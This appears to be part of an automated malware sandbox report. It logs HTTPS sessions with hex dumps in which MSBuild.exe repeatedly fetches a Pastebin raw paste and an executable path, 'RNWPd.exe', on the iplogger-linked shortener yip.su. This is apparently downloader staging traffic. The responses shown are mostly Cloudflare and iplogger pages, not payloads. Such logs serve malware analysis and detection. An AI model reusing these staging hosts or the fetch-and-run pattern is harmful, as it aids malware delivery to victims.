                    2024-09-16 19:22:08 UTC1369INData Raw: 2e 33 39 31 70 78 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 67 72 69 64 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68
                    Data Ascii: .391px}.feedback-content{align-content:space-between;display:inline-grid;height:100vh;margin:0;padding:0}.feedback-content .spacer{margin:0}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-top:4rem}.h
                    2024-09-16 19:22:08 UTC1369INData Raw: 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c
                    Data Ascii: tLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{background-image:url
                    2024-09-16 19:22:08 UTC1369INData Raw: 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 20 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28
                    Data Ascii: le}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id{text-align:center}.footer .ray-id code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (
                    2024-09-16 19:22:08 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 34 70 78 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 20 61 7b 63
                    Data Ascii: allenge-error-text{background-position:100%;padding-left:0;padding-right:34px}.challenge-content .spacer{margin:2rem 0}.challenge-content .loading-spinner{height:76.391px}@media (prefers-color-scheme:dark){body{background-color:#222;color:#d9d9d9}body a{c
                    2024-09-16 19:22:08 UTC1369INData Raw: 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e
                    Data Ascii: S4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}}</style><meta http-equiv="refresh" conten
                    2024-09-16 19:22:08 UTC1369INData Raw: 45 65 66 6d 68 37 38 31 78 68 4c 73 64 49 57 6b 72 70 71 6c 79 41 59 52 69 6b 73 52 71 61 36 2e 57 70 53 4d 7a 31 4d 63 47 77 5f 71 32 6b 32 47 36 4d 37 64 4a 55 41 4b 41 39 30 55 6b 64 39 38 4c 45 42 72 48 6e 50 79 67 6b 4a 46 37 56 47 69 56 64 6e 52 4c 7a 67 56 6d 4e 63 6c 4a 6f 62 45 59 41 79 72 63 42 2e 4e 45 4e 61 5a 78 6c 69 7a 41 35 70 66 6b 77 4e 64 39 68 68 74 34 51 51 36 47 71 7a 64 38 46 2e 6f 4d 7a 64 46 41 53 36 4c 39 41 2e 42 69 37 56 42 5a 4c 79 52 35 70 33 41 43 49 37 48 6d 6e 6d 65 74 76 67 48 56 4c 4d 61 77 50 4c 42 50 64 7a 78 31 32 71 68 32 33 34 6c 58 55 48 4e 4e 74 66 41 6e 75 66 7a 76 4e 57 72 32 37 63 55 4e 33 35 76 32 6d 72 73 63 73 52 4c 4b 6d 49 4c 72 32 5a 6b 77 74 45 2e 66 50 51 32 49 61 42 76 6d 63 65 75 78 4a 33 71 71 76 4c
                    Data Ascii: Eefmh781xhLsdIWkrpqlyAYRiksRqa6.WpSMz1McGw_q2k2G6M7dJUAKA90Ukd98LEBrHnPygkJF7VGiVdnRLzgVmNclJobEYAyrcB.NENaZxlizA5pfkwNd9hht4QQ6Gqzd8F.oMzdFAS6L9A.Bi7VBZLyR5p3ACI7HmnmetvgHVLMawPLBPdzx12qh234lXUHNNtfAnufzvNWr27cUN35v2mrscsRLKmILr2ZkwtE.fPQ2IaBvmceuxJ3qqvL


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    30192.168.2.649759104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:09 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:22:09 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c43393fb883428f-EWR
                    2024-09-16 19:22:09 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:22:09 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:22:09 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:22:09 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:22:09 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.649760188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:10 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:22:11 UTC912INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:22:11 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:22:11 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPSfT0cTVmHZS%2Bm%2FaL4vgGZ%2BtbvRf6R%2F9xWwX%2BcHUGhLgIsLMccj7Pa%2BJy4mFT7lN87IHpwJ9xR%2F%2BVhms95yoojknITcaKeNeYK2SOZSROt6Vg%2FMUl3oU7A%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433948fe648cc6-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:22:11 UTC457INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:22:11 UTC1369INData Raw: 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c
                    Data Ascii: ="revisit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><
                    2024-09-16 19:22:11 UTC1369INData Raw: 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d
                    Data Ascii: ;background-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-anim
                    2024-09-16 19:22:11 UTC1369INData Raw: 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69
                    Data Ascii: avigator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.i
                    2024-09-16 19:22:11 UTC1369INData Raw: 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a
                    Data Ascii: </script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:
                    2024-09-16 19:22:11 UTC1369INData Raw: 3b 68 65 69 67 68 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09
                    Data Ascii: ;height:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain">
                    2024-09-16 19:22:11 UTC168INData Raw: 64 6f 6d 28 29 29 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: dom()),a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:22:11 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.649761104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:15 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:22:15 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433966e8098ca7-EWR
                    2024-09-16 19:22:15 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
